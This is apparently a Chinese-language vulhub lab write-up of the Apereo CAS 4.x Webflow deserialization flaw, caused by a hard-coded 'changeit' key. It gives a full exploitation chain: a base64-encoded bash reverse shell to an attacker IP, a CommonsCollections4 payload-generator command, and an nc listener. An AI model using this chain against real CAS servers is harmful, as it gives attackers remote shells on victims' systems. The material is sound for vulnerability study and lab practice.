Apereo-cas 4.x反序列化漏洞
影响范围
Apereo-cas 4.1.7之前
漏洞成因
Webflow中使用了默认密钥changeit,代码如下:
public class EncryptedTranscoder implements Transcoder {
private CipherBean cipherBean;
private boolean compression = true;
public EncryptedTranscoder() throws IOException {
BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
bufferedBlockCipherBean.setKeyAlias("aes128");
bufferedBlockCipherBean.setKeyPassword("changeit");
bufferedBlockCipherBean.setNonce(new RBGNonce());
this.setCipherBean(bufferedBlockCipherBean);
}
漏洞利用
环境准备
名称 | IP |
---|---|
攻击机 | 192.168.75.162 |
靶机 | 192.168.75.146 |
首先输入以下命令进入vulhub里启动靶场,然后在攻击机里访问http://192.168.75.146:8080/cas/login即可
cd vulhub-master/apereo-cas/4.1-rce
docker-compose up -d
漏洞复现
首先准备好生成payload的工具:apereo-cas-attack-1.0-SNAPSHOT-all.jar
工具地址:https://github.com/vulhub/Apereo-CAS-Attack/releases
然后准备好反弹shell的命令,需要对其进行base64加密
//反弹shell命令,注意替换为自己的
bash -i >& /dev/tcp/192.168.75.162/6666 0>&1
//base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc1LjE2Mi82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}"
执行完上述命令会生成一串payload,接下来新打开一个cmd窗口执行以下命令:
nc -lvvp 6666
监听启动后我们在浏览器输入账号密码抓包,发送到重放器,替换execution的内容并发送,可以看到如下图,反弹shell成功,此漏洞利用成功